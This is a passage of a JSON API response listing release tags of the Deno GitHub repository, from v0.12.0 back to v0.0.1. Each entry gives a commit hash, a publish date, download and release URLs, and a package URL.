:null,"purl":"pkg:github/denoland/deno@v0.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0/manifests"},{"name":"v0.11.0","sha":"92ac616708cb067a1b895283913c5ecd25c6d873","kind":"tag","published_at":"2019-07-07T16:19:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0/manifests"},{"name":"v0.10.0","sha":"c56df45355c8e68eabbfa62021e7ca7484115c0b","kind":"tag","published_at":"2019-06-25T14:11:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0/manifests"},{"name":"v0.9.0","sha":"7b06aa37342c021f9f1fac99125847d134e67001","kind":"commit","published_at":"2019-06-15T16:04:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0/manifests"},{"name":"v0.8.0","sha":"d60bdb6350f2583e35d020f6cebb6aa30262fbcc","kind":"commit","published_at":"2019-06-08T19:16:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0/manifests"},{"name":"v0.7.0","sha":"5265bd7cb1f86af99b01d73c537d52a50df95fe2","kind":"commit","published_at":"2019-05-29T22:42:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0/manifests"},{"name":"v0.6.0","sha":"22feb74ba12215597416b5531f8a557302283e79","kind":"commit","published_at":"2019-05-20T19:22:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0/manifests"},{"name":"v0.5.0","sha":"23aca36d52220efbfbc07abbe165bd2c9ade2009","kind":"commit","published_at":"2019-05-11T21:19:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0/manifests"},{"name":"v0.4.0","sha":"2aae09c2b869bf5d0bc5fd269464e8ac504528ea","kind":"commit","published_at":"2019-05-03T23:33:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0/manifests"},{"name":"v0.3.11","sha":"3b1e2f1ad42cfebb6f2568e54c82c5ac3c8fe3d4","kind":"commit","published_at":"2019-05-03T22:05:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11/manifests"},{"name":"v0.3.10","sha":"40d8ef1ec9f5e50017c41af8bf3b9f8454f97544","kind":"tag","published_at":"2019-04-25T20:00:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10/manifests"},{"name":"v0.3.9","sha":"e725b26b289fbe96b679039ba4203f10f7229ab9","kind":"tag","published_at":"2019-04-25T15:46:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9/manifests"},{"name":"v0.3.8","sha":"0796a8f2f75005df95ef6115a4bdf6dd66e58dc3","kind":"commit","published_at":"2019-04-19T15:41:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8/manifests"},{"name":"v0.3.7","sha":"8584d80cfd26111825af5a69fc6ae4c367ad0700","kind":"commit","published_at":"2019-04-11T19:35:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7/manifests"},{"name":"v0.3.6","sha":"744e56cb58f90acde7baf8811676021fb55b2f2a","kind":"tag","published_at":"2019-04-04T14:04:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6/manifests"},{"name":"v0.3.5","sha":"b965c7ab367a417fb7bdde2eaf38312179e5c183","kind":"commit","published_at":"2019-03-28T20:58:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5/manifests"},{"name":"v0.3.4","sha":"223a2adbb46cb33e75ffe861ecaff6ff7e6d555e","kind":"commit","published_at":"2019-03-20T22:54:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4/manifests"},{"name":"v0.3.3","sha":"3dbb06e699398549e8cfabc896ef3256ab433cba","kind":"tag","published_at":"2019-03-13T18:16:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3/manifests"},{"name":"v0.3.2","sha":"535037b519711d238dc0bfa2c4d2ffb4b17dec53","kind":"commit","published_at":"2019-03-07T02:22:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2/manifests"},{"name":"v0.3.1","sha":"b0c7b54f692ecc866d4f70bfa384631523bbf924","kind":"commit","published_at":"2019-02-27T21:20:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1/manifests"},{"name":"v0.3.0","sha":"a5720d9e28f7ee5868049504816405392c2821d7","kind":"commit","published_at":"2019-02-19T04:22:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0/manifests"},{"name":"v0.2.11","sha":"b2fb8261e700c75cfb9a626ae57bbd3098e08454","kind":"commit","published_at":"2019-02-09T04:34:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11/manifests"},{"name":"v0.2.10","sha":"c3241822522fb2b13792fe5666596888057cf829","kind":"commit","published_at":"2019-02-02T23:26:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10/manifests"},{"name":"v0.2.9","sha":"1681bda14d1552860645e40f91f667accefe50cb","kind":"commit","published_at":"2019-01-30T03:57:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9/manifests"},{"name":"v0.2.8","sha":"a47d545e4d0831713d0107e86cead7b4506a9bf6","kind":"commit","published_at":"2019-01-19T16:54:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8/manifests"},{"name":"v0.2.7","sha":"eb4a19ef6ef1c5ae797fb515c45627deca65cf31","kind":"commit","published_at":"2019-01-15T01:25:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7/manifests"},{"name":"v0.2.6","sha":"404e6f86345216c9205cabb88b19eaca762095e0","kind":"commit","published_at":"2019-01-07T22:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6/manifests"},{"name":"v0.2.5","sha":"320577c131c8058ba0065f26119ce1ce18bc23d2","kind":"commit","published_at":"2019-01-01T19:30:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5/manifests"},{"name":"v0.2.4","sha":"c6e2fffc1388cdb4411d6c2cff36c4febb7c75d5","kind":"commit","published_at":"2018-12-24T04:39:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4/manifests"},{"name":"v0.2.3","sha":"c69d2f554d05ba9e4d09af6ae451ce5676876e61","kind":"commit","published_at":"2018-12-14T20:11:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3/manifests"},{"name":"v0.2.2","sha":"e6121762f8bf3c531c4c60229ff4a156ae21d931","kind":"commit","published_at":"2018-12-07T22:44:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2/manifests"},{"name":"v0.2.1","sha":"b5c6bfa0c8a3df9598211bc68db5408f5eec147d","kind":"commit","published_at":"2018-12-01T00:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1/manifests"},{"name":"v0.2.0","sha":"d083f7271b11d87ddba90869d2bcd2cf312e77af","kind":"commit","published_at":"2018-11-16T05:23:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0/manifests"},{"name":"v0.1.12","sha":"0c740ff85d855177d1619276154f63a36ed31557","kind":"commit","published_at":"2018-11-12T17:16:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12/manifests"},{"name":"v0.1.11","sha":"e1d5f82d36f08b9c7a7c6233b7ce354a5cf82836","kind":"commit","published_at":"2018-11-05T22:51:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11/manifests"},{"name":"v0.1.10","sha":"da959e8c878382ce3417ab61db8ccf1ae9a660fa","kind":"commit","published_at":"2018-10-27T15:13:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10/manifests"},{"name":"v0.1.9","sha":"c85311dd7dbad09242633d2ee7a83fdb1cbd1d7f","kind":"commit","published_at":"2018-10-21T00:30:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9/manifests"},{"name":"v0.1.8","sha":"d92c99eabaf28100a8d181b6f289e2e3fc295107","kind":"commit","published_at":"2018-10-12T18:44:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8/manifests"},{"name":"v0.1.7","sha":"5307aa94e14d99a226366a275e011a60161c9c39","kind":"commit","published_at":"2018-10-04T12:56:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7/manifests"},{"name":"v0.1.6","sha":"77e876388bf1b2b3959f25a1cb057a1f96c76ba7","kind":"commit","published_at":"2018-09-29T17:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6/manifests"},{"name":"v0.1.5","sha":"8e958d3ad68e610061e82fb9f456eab79330633e","kind":"commit","published_at":"2018-09-22T03:21:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5/manifests"},{"name":"v0.1.4","sha":"d38b3b585ca68f4bc9e95faa6c9c036dc8982575","kind":"commit","published_at":"2018-09-13T00:45:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4/manifests"},{"name":"v0.1.3","sha":"59f3fca166e7d3bd3095f9df0f7040defe3239e1","kind":"commit","published_at":"2018-09-06T03:08:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3/manifests"},{"name":"v0.1.2","sha":"cce3bd470b19e1c2eab6530d06c48949891a56fc","kind":"commit","published_at":"2018-08-30T22:29:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2/manifests"},{"name":"v0.1.1","sha":"c42e4ddbb7973bfb0c57a49ab6bf6dc432baad7e","kind":"commit","published_at":"2018-08-28T13:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1/manifests"},{"name":"v0.1.0","sha":"68d388229ea6ada339d68eb3d67feaff7a31ca97","kind":"commit","published_at":"2018-08-23T14:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0/manifests"},{"name":"v0.0.3","sha":"ca4ace6b1f054593029df4958538708c2fbbabc2","kind":"commit","published_at":"2018-08-22T16:08:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3/manifests"},{"name":"v0.0.2","sha":"6a8fbc8b522a710699bcf9738c2194dec797b428","kind":"commit","published_at":"2018-08-21T03:43:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2/manifests"},{"name":"v0.0.1","sha":"67d89ff692a88ae42145043eac1a5c58413ae110","kind":"commit","published_at":"2018-08-17T16:58:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/